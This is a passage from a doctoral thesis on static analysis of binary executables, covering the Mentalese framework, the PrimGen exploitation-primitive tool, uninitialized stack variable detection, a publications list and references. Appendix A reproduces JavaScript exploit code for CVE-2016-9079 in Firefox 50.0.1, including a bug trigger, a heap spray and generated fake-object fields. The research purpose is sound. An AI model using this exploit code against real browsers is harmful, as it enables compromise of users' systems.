An analyzer that faces these scenarios needs, in order to be sound, to make conservative descriptions of program behaviors. In the case of indirect calls, a conservative description can be to account for all functions; a library can be described as unsafe with respect to some behavior of interest. Such assumptions are not only a burden to scalability but also increase the number of false warnings. For this reason, common bug finding tools, such as the one presented in this chapter, are neither sound nor complete, making trade-offs between sound and unsound decisions. A trend that trades full soundness for scalability, being partially sound, comes with the term soundiness [130]. Systems that follow this description guarantee soundness under a specific context, i.e., a part of the code under analysis [137], or a restricted subset of the language semantics. In either case, soundness holds only outside of the cases that cannot be handled.

Another direction that deviates from the traditional concept of static analyzers is soundness from the point of view of dynamic analyzers. Here, soundness means that a reported bug is indeed a true bug. For a static bug finding tool, a severe number of false positives is a crucial problem. For bug hunting, it seems natural to miss bugs, but to have a stronger guarantee that, in the case of a warning, the error is a true positive. Work that tackles this direction in static analysis, i.e., being sound in a dynamic sense, is proposed by Gorogiannis et al. [89].

5.5 Related Work

The development of methods for static analysis spans a wide variety of techniques. Modern compilers like the GNU Compiler, MSVC, or Clang can report uninitialized variables at compile time. They utilize the underlying compiler framework to implement an intraprocedural analysis to detect potential uninitialized variables. As discussed earlier, compilers are trimmed to run fast, and the analysis time of costly interprocedural algorithms is not desired. For optimization purposes, the benefits of extensive interprocedural analyses might not justify their application [171]. Flake was one of the first to discuss attacks against overlapping data [76], an attack vector closely related to our work on uninitialized memory reads. His presentation focuses on finding paths that have overlapping stack frames with a target (uninitialized) variable. Wang et al. present case studies about undefined behavior [210], some of which is induced by the use of uninitialized variables. In a more recent work, Lee et al. introduce several methods to address undefined behavior in the LLVM compiler with a small performance overhead [124]. A popular attempt to tackle the problem of uninitialized memory reads is binary hardening. StackArmor [44] represents a hardening technique that is tailored to protect against stack-based vulnerabilities. To determine functions that might be prone to uninitialized reads, static analysis is used to identify stack locations which cannot be proven to be safe. The system can protect against uninitialized reads but cannot detect them. SafeInit [145] extended this idea and represents a hardening technique specifically designed to mitigate uninitialized read vulnerabilities. The authors approach the problem from source code: based on Clang and LLVM, the general idea is to initialize all values at the allocation sites of heap and stack. In order to keep the overhead low, several strategies are applied to identify suitable spots.
They modify the compiler to insert their initialization procedures. By leveraging a multi-variant execution approach, uninitialized reads can be detected.

This, however, needs a corpus of proper inputs that can trigger those spots. UniSan [134] represents a similar approach to protect operating system kernels. Based on LLVM, the authors propose a compiler-based approach to eliminate information leaks caused by uninitialized data, utilizing data flow analysis to trace execution paths that lead to possible leaking spots. UniSan checks allocations for being fully initialized when they leave the kernel space, and instruments the kernel to initialize allocations with zeros if the check is violated. Another recent approach by Lu et al. [135] targets uninitialized reads in the Linux kernel. They propose techniques for stack spraying to enforce an overlap of the sprayed data with uninitialized memory. With a combination of symbolic execution and fuzzing, they present a deterministic way to find execution paths which prepare data that overlaps with the data of a vulnerability. Giuffrida et al. [84] present a monitoring infrastructure to detect different kinds of vulnerabilities, among them uninitialized reads. They perform static analysis at compile time to index program state invariants and identify typed memory objects. The invariants represent safety constraints which are instrumented as metadata into the final binary. Their approach also allows metadata to be updated and managed dynamically. The proposed framework monitors the application in real time and checks for invariant violations. Ye et al. propose a static value-flow analysis [215]. They analyze the source code and construct a value flow graph which serves to deduce a measure of definedness for variables. The analysis results are used to optimize the instrumentation process of binaries. Other systems which instrument binaries either at compile or execution time to detect uninitialized reads at runtime have been proposed in the literature [190, 27]. These systems can be used in combination with a fuzzer or a test suite to detect uninitialized variables.
One advantage of these dynamic systems is that for each detected uninitialized bug an input vector can be derived. On the other hand, only executed paths are examined, and hence the code coverage is typically low. In addition, an appropriate corpus of input data is needed. In contrast, our static approach is capable of analyzing binary executables in a scalable way that provides high code coverage. In summary, the wealth of work in recent research, most of which relies on source code, is tailored to instrumentation purposes to aid dynamic analysis in a monitoring environment. In contrast, our approach follows a purely static, large-scale analysis that addresses the proactive detection of bugs in binary executables.

5.6 Conclusion

Uninitialized memory reads in an application can be utilized by an attacker in a variety of ways, the typical use case being an information leak that allows an attacker to subsequently bypass information hiding schemes. In this chapter, we proposed a novel static analysis approach to detect such vulnerabilities, with a focus on uninitialized stack variables. The modularity of our framework enables flexibility. We have built a prototype of the proposed approach that is capable of performing large-scale analyses to detect uninitialized memory reads in both synthetic examples and complex, real-world binaries. We believe that our system delivers new impulses to other researchers.

6 Conclusion

In this thesis, we tackled a niche in the sector of program analysis which targets binary executables. It poses many difficult challenges which we faced throughout this thesis, but we have also seen some of its pleasant benefits. In large code bases with billions of lines of code, it is unclear how different modules might interact. Subsets of the code base are orchestrated and compiled into a single binary according to operating system, architecture, and selected features which might be specific to the platform or architecture. Analyzing the binary lets us focus on the purposed context, and it gives us a handle on whole-program analysis. Building analysis tools in this sector needs a strong foundation that gives researchers access to building blocks. As we saw, the intermediate steps in the renaming algorithm of SSA can yield valuable information to be incorporated in the analysis process. It is crucial to enable access to these inner workings and to all the algorithms that serve as building blocks. We set great value on flexibility that allows us to concentrate on the problem itself, put ourselves as humans into a feedback loop, and allow other analysis procedures to contribute knowledge that each analysis can benefit from in a transparent fashion. Besides flexibility, we also put great value on scalability and reliability; many research projects do not scale to real-world programs, or crash. These were the motivations behind Mentalese, a framework that strives to ease the process of developing analyses. In the second chapter we gave an overview of the landscape of intermediate languages, how they serve our field, and how we approached the field with VEX-IR. Based on VEX-IR, we started to build static analyses and a symbolic execution engine whose single purpose was to process paths. We used this

engine in the process of finding suitable paths to trigger dynamic hooks [207]. An extension of this engine served in the process of a cross-architecture bug search [158]. At the end of the chapter, we discussed why we changed to an IL that was more suitable to our needs. Built on top of Amoco [198], we developed SymIL, which serves in the preprocessing stage of Mentalese, where the CFG of the binary is reconstructed by off-the-shelf tools, put into JSON, piped into Amoco, lifted to SymIL, and finally transformed into Mental-IR. This process is detailed in Chapter 3, where we present Mentalese. Here we show how Datalog naturally fits the way we wanted to approach binary analysis, specifically with regard to data flow problems. We describe how we implemented our libraries and building blocks, and how all of the components contribute knowledge in a transparent fashion. Special care is given to the pointer analysis, which is an important building block to improve the precision of many analyses. We show how pointer analysis, taint analysis, slicing, and value propagation relate to each other as derivatives of the same basic patterns that are put into declarative algorithms. At the end of this chapter we show that the pointer analysis serves as a building block in an early stage of a binary similarity procedure. In Chapter 4 we present PrimGen, a tool built on top of Mentalese. Here we follow the goal of locating reachable exploitation primitives in complex binary code such as modern browsers. Given a crashing input and a point of control, PrimGen combines static and dynamic analysis techniques to find exploitation primitives. PrimGen not only finds these primitives, but also searches for satisfiable paths that drive the execution into an exploitable state. These paths are verified dynamically. Given the original PoC, it was interesting to see how a bug that gives control over an object field can be exploited in a variety of ways.
With PrimGen, we found 48 alternative ways to drive execution to exploitable states. In Chapter 5 we present another prototype that builds on Mentalese. Here we make extensive use of its pointer analysis component. Our prototype manages to unveil uninitialized stack variables in real-world binaries. To tackle path-sensitivity, it puts symbolic execution into the feedback loop, which filters out warnings. Please recall from Figure 3.2 and Figure 5.2 that Mentalese has a feedback loop where knowledge can be added to Mental-IR to improve the precision of the analyses. The greater vision, however, was to add more dynamic techniques, especially fuzzers, into the feedback loop and induce a synergy between them, which we left for future work.

Overall, we have just scratched the surface of what is possible. Mentalese can be used for variant analysis on binaries in a similar fashion as Semmle's QL does on source code. Mentalese can be used as a fast and lightweight preprocessing static analyzer that guides dynamic approaches to interesting spots. The benefit of static analysis is often linked to its theoretical property of full coverage. However, the greater value we see is its ability to start the analysis at each program point, which is compliant with what we seek in terms of flexibility. We argue that being able to add knowledge to the analyzer at any point in time, where all other algorithms adapt transparently, is a powerful feature that harmonizes with the idea of putting dynamic analyses into the process. The motivation here is to add dynamic analyzers into the process which introduce knowledge that is hard to compute by static approaches, and in turn static approaches put knowledge into the loop that is hard to obtain for dynamic approaches. The idea is not new; however, a synergy between these approaches is hard to achieve. By synergy we mean static and dynamic analyzers that continuously add knowledge to the analysis process, where each analyzer transparently adapts to new information that is interesting for its specific need to either proceed or add precision. Future work would need to investigate and implement this vision.

Appendices


A JavaScript Code Corresponding to CVE-2016-9079

This appendix contains the JavaScript code that corresponds to our running example in Chapter 4. Please refer to https://github.com/RUB-SysSec/PrimGen for all the data that were generated and used for our evaluation. In the following, we list all components of a generated EPT script corresponding to our running example from Figure 4.4. Listing A.1 shows the JS code that is needed to trigger the vulnerability (CVE-2016-9079). Listing A.1 merged together with Listing A.2 drives Firefox 50.0.1 32-bit to the control point. This merged code is used as a template and fed into PrimGen, where the gen() function exists (as in Listing A.3) but does not yet set any specific values. PrimGen then creates the code shown in Listing A.3 based on the generated memory map to set memory values. Hence, all three JS code listings merged together constitute an EPT example generated by PrimGen to perform the exploitation primitive shown by our running example in Figure 4.4.

function VUT(){
    /* bug trigger ripped from bugzilla report */
    var worker = new Worker('data:javascript,self.onmessage=function(msg){postMessage("one");postMessage("two");};');
    worker.postMessage("zero");
    svgns = 'http://www.w3.org/2000/svg';
    heap80 = new Array(0x1000);
    heap100 = new Array(0x4000);
    block80 = new ArrayBuffer(0x80);
    block100 = new ArrayBuffer(0x100);
    sprayBase = undefined;
    arrBase = undefined;
    animateX = undefined;
    containerA = undefined;
    var offset = 0x88 // Firefox 50.0.1

133 134 A. JavaScript Code Corresponding to CVE-2016-9079

var exploit= function (){ var u32= new Uint32Array(block80) u32[0x4] = arrBase- offset; u32[0xa] = arrBase- offset; u32[0x10] = arrBase- offset; u32[0] = 0xaabbccdd; u32[1] = 0xaabbccee; u32[0x11]=0xaabbccff; for(i= heap100.length/2;i< heap100.length;i++) { heap100[i] = block100.slice(0) } for(i = 0;i< heap80.length/2;i++) { heap80[i] = block80.slice(0) } animateX.setAttribute(’begin’,’59s’) animateX.setAttribute(’begin’,’58s’) for(i= heap80.length/2;i< heap80.length;i++) { heap80[i] = block80.slice(0) } for(i= heap100.length/2;i< heap100.length;i++) { heap100[i] = block100.slice(0) } animateX.setAttribute(’begin’,’10s’) animateX.setAttribute(’begin’,’9s’) containerA.pauseAnimations(); }// end exploit()

/* spray fake objects*/ heap= prepare_memory() worker.onmessage= function (e){arrBase=base_addr; exploit()}

} var trigger= function (){ containerA= document.createElementNS(svgns,’svg’) var containerB= document.createElementNS(svgns,’svg’); animateX= document.createElementNS(svgns,’animate’) var animateA= document.createElementNS(svgns,’animate’) var animateB= document.createElementNS(svgns,’animate’) var animateC= document.createElementNS(svgns,’animate’) var idA="ia"; var idC="ic"; animateA.setAttribute(’id’, idA); animateA.setAttribute(’end’,’50s’); animateB.setAttribute(’begin’,’60s’); animateB.setAttribute(’end’, idC+’.end’); animateC.setAttribute(’id’, idC); animateC.setAttribute(’end’, idA+’.end’); containerA.appendChild(animateX) containerA.appendChild(animateA) containerA.appendChild(animateB) containerB.appendChild(animateC) document.body.appendChild(containerA); document.body.appendChild(containerB); }

VUT(); window.onload= trigger; setInterval("window.location.reload()", 3000) Listing A.1: VUT: JS code to trigger CVE-2016-9079 in Firefox 50.0.1 A. JavaScript Code Corresponding to CVE-2016-9079 135

/* address of fake object */
base_addr = 0x30300000;

/* heap spray inspired by skylined */
function prepare_memory(){
  var heap = [];
  var current_address = 0x08000000;
  var block_size = 0x01000000;

  function set(offset, value){
    heap_block[idx/4 + offset/4] = value;
  }

  function gen(){...}

  while (current_address < base_addr){
    var heap_block = new Uint32Array(block_size/4 - 0x100);
    for (var idx = 0; idx < block_size; idx += 0x100000){
      gen();
    }
    heap.push(heap_block);
    current_address += block_size;
  }
  return heap;
}

Listing A.2: JS code to spray the heap in Firefox 50.0.1 in order to fill memory with controlled values
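The spray arithmetic in Listing A.2 can be checked in isolation. Since gen() is invoked at every 0x100000-byte slot inside every 0x01000000-byte block, a field written via set(offset, value) appears at every slot-aligned address plus offset; because base_addr is slot-aligned and lies inside the sprayed range, the fake object's fields land at base_addr + offset. The sketch below illustrates this; field_address() is a hypothetical helper and the layout constants are taken from the listing under that assumption.

```javascript
// Mirrors the constants of Listing A.2 (assumed layout).
var base_addr = 0x30300000;   // address of the fake object
var spray_start = 0x08000000; // first sprayed block
var slot_size = 0x100000;     // gen() pattern repeats every 1 MiB

// Address at which a field written via set(offset, value) becomes
// visible for the slot containing a given target address
// (field_address() is a hypothetical helper for illustration).
function field_address(target, offset) {
  var slot_start = Math.floor(target / slot_size) * slot_size;
  return slot_start + offset;
}

// base_addr is slot-aligned and above spray_start, so set(0x70, v)
// places v at base_addr + 0x70.
var covered = spray_start <= base_addr && base_addr % slot_size === 0;
console.log(covered, field_address(base_addr, 0x70).toString(16));
```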

function gen(){
  /* automatically generated code */
  set(0xac, 0x1);
  set(0x70, base_addr + 0x110);
  set(0x0, base_addr + 0x1094);
  set(0x10ac, 0xff);
  set(0x10a8, base_addr + 0x20ac);
  set(0x20ac, base_addr + 0x2f74);
  set(0x30ac, base_addr + 0x220);
}

Listing A.3: JS object fields generated by PrimGen to perform the desired exploitation primitive in the running example

Publications

During the time of this dissertation, the author contributed to the following publications:

• Static Detection of Uninitialized Stack Variables in Binary Code Behrad Garmany, Martin Stoffel, Robert Gawlik, Thorsten Holz. In European Symposium on Research in Computer Security (ESORICS), Luxembourg, September 2019

• Towards Automated Generation of Exploitation Primitives for Web Browsers Behrad Garmany, Martin Stoffel, Robert Gawlik, Philipp Koppe, Tim Blazytko, Thorsten Holz. In Annual Computer Security Applications Conference (ACSAC), San Juan, Puerto Rico, USA, December 2018

• Automated Multi-Architectural Discovery of CFI-Resistant Code Gadgets Patrick Wollgast, Robert Gawlik, Behrad Garmany, Benjamin Kollenda, Thorsten Holz. In European Symposium on Research in Computer Security (ESORICS), Heraklion, Greece, September 2016

• Detile: Fine-Grained Information Leak Detection in Script Engines Robert Gawlik, Philipp Koppe, Benjamin Kollenda, Andre Pawlowski, Behrad Garmany, Thorsten Holz. In Conference on Detection of Intrusions and Malware & Vulnerability Assessment (DIMVA), Donostia-San Sebastián, Spain, July 2016

• Enabling Client-Side Crash-Resistance to Overcome Diversification and Information Hiding. Robert Gawlik, Benjamin Kollenda, Philipp Koppe, Behrad Garmany, Thorsten Holz. In Annual Network & Distributed System Security Symposium (NDSS), February 2016

• Cross-Architecture Bug Search in Binary Executables Jannik Pewny, Behrad Garmany, Robert Gawlik, Christian Rossow, Thorsten Holz. In 36th IEEE Symposium on Security and Privacy (Oakland), San Jose, May 2015

• Dynamic Hooks: Hiding Control Flow Changes within Non-Control Data Sebastian Vogl, Robert Gawlik, Behrad Garmany, Thomas Kittel, Jonas Pfoh, Claudia Eckert, and Thorsten Holz. In 23rd USENIX Security Symposium, San Diego, CA, USA, August 2014

• PRIME: Private RSA Infrastructure for Memory-less Encryption Behrad Garmany, Tilo Müller. In Annual Computer Security Applications Conference (ACSAC), New Orleans, USA, December 2013 (Outstanding Paper Award)

137 138 References

[1] Martín Abadi et al. “Control-Flow Integrity”. In: ACM Conference on Computer and Communications Security (CCS). 2005. [2] A. V. Aho, J. E. Hopcroft, and J. D. Ullman. “On Finding Lowest Common Ancestors in Trees”. In: Proceedings of the Fifth Annual ACM Symposium on Theory of Computing. 1973. [3] Alfred V. Aho and Margaret J. Corasick. “Efficient String Matching: An Aid to Bibliographic Search”. In: Commun. ACM 18.6 (1975), pp. 333–340. [4] Alfred V. Aho et al. Compilers: Principles, Techniques, and Tools (2Nd Edition). Boston, MA, USA: Addison-Wesley Longman Publishing Co., Inc., 2006. [5] Periklis Akritidis. “Cling: A Memory Allocator to Mitigate Dangling Pointers”. In: USENIX Security Symposium. 2010. [6] Jeffrey Ullman Alfred Aho Ravi Sethi and Monica S. Lam. Compilers: Principles, Techniques, and Tools. 2006. [7] Lars Ole Andersen. “Program Analysis and Specialization for the C Programming Language”. PhD thesis. DIKU, University of Copenhagen, 1994. [8] P Anderson. “The Use and Limitations of Static-Analysis Tools to Improve Software Quality”. In: 21 (June 2008). [9] Dennis Andriesse et al. “An In-Depth Analysis of Disassembly on Full-Scale x86/x64 Binaries”. In: USENIX Security Symposium. 2016. [10] Molham Aref et al. “Design and Implementation of the LogicBlox System”. In: Proceedings of the 2015 ACM SIGMOD International Conference on Management of Data. Association for Computing Machinery, 2015. [11] Michalis Athanasakis et al. “The Devil is in the Constants: Bypassing Defenses in Browser JIT Engines”. In: Symposium on Network and Distributed System Security (NDSS). 2015. [12] Thanassis Avgerinos et al. “AEG: Automatic Exploit Generation”. In: Symposium on Network and Distributed System Security (NDSS). 2011. [13] Ivan Baev. Profile-based Indirect Call Promotion. https://llvm.org/devmtg/2015-10/slides/Baev-IndirectCallPromotion.pdf. 2015. [14] Vasanth Bala, Evelyn Duesterwald, and Sanjeev Banerjia. “Dynamo: a transparent dynamic optimization system”. 
In: ACM SIGPLAN Notices (2000). [15] Gogul Balakrishnan et al. “Model checking x86 executables with CodeSurfer/x86 and WPDS++”. In: Computer Aided Verification. Springer. 2005, pp. 158–163.

139 140 References

[16] George Balatsouras and Yannis Smaragdakis. “Structure-sensitive points-to analysis for C and C++”. In: International Static Analysis Symposium. Springer. 2016, pp. 84–104. [17] T. Bao et al. “Your Exploit is Mine: Automatic Shellcode Transplant for Remote Exploits”. In: IEEE Symposium on Security and Privacy. 2017. [18] Fabrice Bellard. “QEMU, a Fast and Portable Dynamic Translator”. In: Proceedings of the Annual Conference on USENIX Annual Technical Conference. USA: USENIX Association, 2005. [19] Michael A. Bender et al. “Lowest common ancestors in trees and directed acyclic graphs”. In: J. Algorithms 57 (2005). [20] Dirk Beyer et al. “The software model checker Blast”. In: International Journal on Software Tools for Technology Transfer 9.5-6 (2007), pp. 505–525. [21] Armin Biere et al. “Symbolic Model Checking Without BDDs”. In: Proceedings of the 5th International Conference on Tools and Algorithms for Construction and Analysis of Systems. 1999. [22] Marcel Böhme, Van-Thuan Pham, and Abhik Roychoudhury. “Coverage-based Greybox Fuzzing As Markov Chain”. In: ACM Conference on Computer and Communications Security (CCS). 2016. [23] Marcel Böhme et al. “Directed Greybox Fuzzing”. In: ACM Conference on Computer and Communications Security (CCS). 2017. [24] François Bourdoncle. “Efficient chaotic iteration strategies with widenings”. In: Formal Methods in Programming and Their Applications. Vol. 735. Lecture Notes in Computer Science. Springer Berlin Heidelberg, 1993. Chap. 9, pp. 128–141. [25] Robert S. Boyer, Bernard Elspas, and Karl N. Levitt. “SELECT—a Formal System for Testing and Debugging Programs by Symbolic Execution”. In: Proceedings of the International Conference on Reliable Software. 1975. [26] Derek Bruening, Evelyn Duesterwald, and Saman Amarasinghe. “Design and implementation of a dynamic optimization framework for Windows”. In: 4th ACM Workshop on Feedback-Directed and Dynamic Optimization (FDDO-4). 2001. [27] Derek Bruening and Qin Zhao. 
“Practical Memory Checking with Dr. Memory”. In: Proceedings of the 9th Annual IEEE/ACM International Symposium on Code Generation and Optimization. 2011. [28] David Brumley and James Newsome. Alias analysis for assembly. Tech. rep. Technical Report CMU-CS-06-180, Carnegie Mellon University School of Computer Science, 2006. [29] David Brumley et al. “Automatic Patch-Based Exploit Generation is Possible: Techniques and Implications”. In: IEEE Symposium on Security and Privacy. 2008. [30] David Brumley et al. “BAP: A binary analysis platform”. In: Computer aided verification. Springer. 2011, pp. 463–469. [31] Randal E Bryant. “Graph-based algorithms for boolean function manipulation”. In: Computers, IEEE Transactions on 100.8 (1986), pp. 677–691. References 141

[32] Christopher Budd. Pwn2Own: Day 2 and Event Wrap-Up. http://blog.trendmicro.com/pwn2own-day-2-event-wrap/. March 2016. [33] Nathan Burow et al. “Control-Flow Integrity: Precision, Security, and Performance”. In: arXiv preprint arXiv:1602.04056 (2016). [34] Simon Busard and Charles Pecheur. “PyNuSMV: NuSMV as a python library”. In: NASA Formal Methods Symposium. Springer. 2013, pp. 453–458. [35] D. Callahan. “The Program Summary Graph and Flow-sensitive Interprocedual Data Flow Analysis”. In: Proceedings of the ACM SIGPLAN 1988 Conference on Programming Language Design and Implementation. PLDI ’88. 1988. [36] S. Ceri, G. Gottlob, and L. Tanca. “What you always wanted to know about Datalog (and never dared to ask)”. In: IEEE Transactions on Knowledge and Data Engineering (1989). [37] S. Ceri, G. Gottlob, and L. Tanca. “What you always wanted to know about Datalog (and never dared to ask)”. In: IEEE Transactions on Knowledge and Data Engineering (1989). [38] Silvio Cesare and Yang Xiang. “Static analysis of binaries”. In: Software Similarity and Classification. Springer, 2012, pp. 41–49. [39] Sang Kil Cha et al. “Unleashing Mayhem on Binary Code”. In: IEEE Symposium on Security and Privacy. 2012. [40] Shuo Chen et al. “Non-Control-Data Attacks Are Realistic Threats.” In: USENIX Security Symposium. 2005. [41] Wei Chen and Juan Vazquez. "Hack Away at the Unessential" with ExpLib2 in Metasploit. https://blog.rapid7.com/2014/04/07/hack-away-at-the- unessential-with-explib2-in-metasploit/. 2014. [42] X. Chen, A. Slowinska, and H. Bos. “Who allocated my memory? Detecting custom memory allocators in C binaries”. In: 2013 20th Working Conference on Reverse Engineering (WCRE). 2013. [43] Xi Chen, Asia Slowinska, and Herbert Bos. “On the Detection of Custom Memory Allocators in C Binaries”. In: Empirical Softw. Engg. 21.3 (June 2016). [44] Xi Chen et al. “StackArmor: Comprehensive Protection from Stack-based Memory Error Vulnerabilities for Binaries”. 
In: Symposium on Network and Distributed System Security (NDSS). 2015. [45] Yuki Chen. ExpLib2 JavaScript Library. https://github.com/jvazquez-r7/explib2. 2014. [46] Dustin Childs. Pwn2Own 2015: Day Two Results. http://community.hpe.com/t5/Security-Research/Pwn2Own-2015-Day-Two- results/ba-p/6722884. March 2015. [47] Alessandro Cimatti et al. “Nusmv 2: An opensource tool for symbolic model checking”. In: Computer Aided Verification. Springer. 2002, pp. 359–364. [48] clang. clang: a C language family frontend for LLVM. Accessed 2017-10-09. url: http://clang.llvm.org. 142 References

[49] Edmund Clarke, Daniel Kroening, and Flavio Lerda. “A tool for checking ANSI-C programs”. In: Tools and Algorithms for the Construction and Analysis of Systems. Springer, 2004, pp. 168–176. [50] Edmund Clarke et al. “Counterexample-guided abstraction refinement”. In: Computer aided verification. Springer. 2000, pp. 154–169. [51] Edmund Clarke et al. “SATABS: SAT-based predicate abstraction for ANSI-C”. In: Tools and Algorithms for the Construction and Analysis of Systems. Springer, 2005, pp. 570–574. [52] Edmund M Clarke and E Allen Emerson. Design and synthesis of synchronization skeletons using branching time temporal logic. Springer, 1981. [53] Frederick B. Cohen. “Operating System Protection through Program Evolution”. In: Comput. Secur. 12.6 (Oct. 1993), 565–584. [54] Kees Cook. “Kernel Exploitation Via Uninitialized Stack”. In: DEF CON 19. 2011. url: https://www.defcon.org/images/defcon-19/dc-19- presentations/Cook/DEFCON-19-Cook-Kernel-Exploitation.pdf. [55] Patrick Cousot and Radhia Cousot. “Abstract Interpretation: A Unified Lattice Model for Static Analysis of Programs by Construction or Approximation of Fixpoints”. In: Proceedings of the 4th ACM SIGACT-SIGPLAN Symposium on Principles of Programming Languages. 1977. [56] CVE-2012-1889. Vulnerability in Microsoft XML Core Services. http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-1889. [57] CVE-2014-6355. Graphics Component Information Disclosure Vulnerability. http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6355. [58] CVE-2015-0061. TIFF Processing Information Disclosure Vulnerability. http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0061. [59] CVE-Statistics-Chrome. Google Chrome Vulnerability Statistics. http://www.cvedetails.com/product/15031/Google-Chrome.html. 2014. [60] CVE-Statistics-Firefox. Mozilla Firefox Vulnerability Statistics. http://www.cvedetails.com/product/3264/Mozilla-Firefox.html. 2014. [61] CVE-Statistics-IE. 
Microsoft Internet Explorer Vulnerability Statistics. http: //www.cvedetails.com/product/9900/Microsoft-Internet-Explorer.html. 2014. [62] CWE-1104: Use of Unmaintained Third Party Components. https://cwe.mitre.org/data/definitions/1104.html. [63] Ron Cytron et al. “Efficiently computing static single assignment form and the control dependence graph”. In: ACM Transactions on Programming Languages and Systems (TOPLAS) 13.4 (1991), pp. 451–490. [64] DARPA. DARPA | Cyber Grand Challenge. Accessed 2018-01-22. url: http://archive.darpa.mil/cybergrandchallenge/. [65] Debian and Ubuntu OpenSSL packages contain a predictable random number generator. https://www.kb.cert.org/vuls/id/925211/, Accessed 2018-01-09. [66] Artem Dergachev. Clang Static Analyzer - A Checker Developer’s Guide. GitHub, 2016. url: https://github.com/haoNoQ/clang-analyzer-guide. References 143

[67] David Dewey, Bradley Reaves, and Patrick Traynor. “Uncovering Use-After-Free Conditions in Compiled Code”. In: Availability, Reliability and Security (ARES), 2015 10th International Conference on. IEEE. 2015, pp. 90–99. [68] Artem Dinaburg and Andrew Ruef. “Mcsema: Static translation of x86 instructions to llvm”. In: ReCon 2014 Conference, Montreal, Canada. 2014. [69] Thomas Dullien and Sebastian Porst. “REIL: A platform-independent intermediate representation of disassembled code for static code analysis”. In: Proceeding of CanSecWest (2009). [70] Manuel Egele et al. “Blanket Execution: Dynamic Similarity Testing for Program Binaries and Components”. In: USENIX Security Symposium. 2014. [71] Dawson Engler and Daniel Dunbar. “Under-constrained execution: making automatic code destruction easy and scalable”. In: Proceedings of the 2007 international symposium on Software testing and analysis. ACM. 2007, pp. 1–4. [72] Isaac Evans et al. “Control Jujutsu: On the Weaknesses of Fine-Grained Control Flow Integrity”. In: ACM Conference on Computer and Communications Security (CCS). 2015. [73] Ansgar Fehnker et al. “Goanna a static model checker”. In: Formal Methods: Applications and Technology. Springer, 2006, pp. 297–300. [74] Ansgar Fehnker et al. “Model checking software at compile time”. In: Theoretical Aspects of Software Engineering, 2007. TASE’07. First Joint IEEE/IFIP Symposium on. IEEE. 2007, pp. 45–56. [75] Josselin Feist, Laurent Mounier, and Marie-Laure Potet. “Statically detecting use after free on binary code”. In: Journal of Computer Virology and Hacking Techniques 10.3 (2014), pp. 211–217. [76] H. Flake. Attacks on uninitialized local variables. 2006. [77] Halvar Flake. “Attacks on uninitialized local variables”. In: Black Hat EU. 2006. url: http://www.blackhat.com/presentations/bh-europe-06/bh-eu-06-Flake.pdf. [78] J.A. Fodor. The Language of Thought. Language and thought series. Harvard University Press, 1975. [79] Behrad Garmany et al. 
“Towards Automated Generation of Exploitation Primitives for Web Browsers”. In: Proceedings of the 34th Annual Computer Security Applications Conference. ACSAC ’18. 2018. [80] Behrad Garmany et al. “Static Detection of Uninitialized Stack Variables in Binary Code”. In: Computer Security - ESORICS 2019 - 24th European Symposium on Research in Computer Security, Luxembourg, September 23-27, 2019, Proceedings, Part II. 2019. [81] Loukas Georgiadis. “Linear-time algorithms for dominators and related problems”. PhD thesis. Princeton, NJ, USA, 2005. url: ftp://ftp.cs.princeton.edu/techreports/2005/737.pdf. [82] Roberto Giacobazzi, Francesco Logozzo, and Francesco Ranzato. “Analyzing program analyses”. In: ACM SIGPLAN Notices (2015). 144 References

[83] A. Girard and C. Rommel. “Safety in Embedded Software Challenges in Growing from Rapid Rising of Third-Party Code”. In: ATZelektronik worldwide 11 (2016), pp. 18–23. [84] Cristiano Giuffrida, Lorenzo Cavallaro, and Andrew S. Tanenbaum. “Practical Automated Vulnerability Monitoring Using Program State Invariants”. In: Conference on Dependable Systems and Networks (DSN). 2013. [85] Patrice Godefroid, Nils Klarlund, and Koushik Sen. “DART: Directed Automated Random Testing”. In: Proceedings of the 2005 ACM SIGPLAN Conference on Programming Language Design and Implementation. PLDI ’05. 2005. [86] Patrice Godefroid, Michael Y. Levin, and David Molnar. “Automated whitebox fuzz testing”. In: In NDSS. 2008. [87] Enes Göktaş et al. “Undermining Entropy-based Information Hiding (And What to Do About It)”. In: USENIX Security Symposium. 2016. [88] Google. ClusterFuzz. https://github.com/google/oss-fuzz/blob/master/docs/clusterfuzz.md. Accessed: 2018-02-07. [89] Nikos Gorogiannis, Peter W. O’Hearn, and Ilya Sergey. “A True Positives Theorem for a Static Race Detector”. In: Proc. ACM Program. Lang. POPL (Jan. 2019). [90] Neville Grech and Yannis Smaragdakis. “P/Taint: Unified Points-to and Taint Analysis”. In: OOPSLA. New York, NY, USA: Association for Computing Machinery, 2017. [91] T. J. Green et al. Datalog and Recursive Query Processing. 2013. [92] Ben Grubb. Heartbleed disclosure timeline: who knew what and when. http://www.smh.com.au/it-pro/security-it/heartbleed-disclosure- timeline-who-knew-what-and-when-20140415-zqurk.html. Apr. 2014. [93] Jordan Gruskovnjak. Advanced Exploitation of Mozilla Firefox Use-after-free (MFSA 2012-22). http://web.archive.org/web/20150121031623/http: //www.vupen.com/blog/20120625.Advanced_Exploitation_of_Mozilla_ Firefox_UaF_CVE-2012-0469.php. 2012. [94] Istvan Haller, Asia Slowinska, and Herbert Bos. “MemPick: data structure detection in C/C++ binaries”. In: Proceedings of the 20th Working Conference on Reverse Engineering (WCRE). 2013. 
[95] Istvan Haller et al. “Dowsing for Overflows: A Guided Fuzzer to Find Buffer Boundary Violations”. In: USENIX Security Symposium. 2013. [96] Abdul-Aziz Hariri. VMware Exploitation through Uninitialized Buffers. https://www.thezdi.com/blog/2018/3/1/vmware-exploitation-through- uninitialized-buffers. March 2018. [97] Rebecca Hasti and Susan Horwitz. “Using Static Single Assignment Form to Improve Flow-insensitive Pointer Analysis”. In: ACM SIGPLAN Conference on Programming Language Design and Implementation (PLDI). 1998. [98] Sean Heelan. “Automatic generation of control flow hijacking exploits for software vulnerabilities”. MA thesis. University of Oxford, 2009. References 145

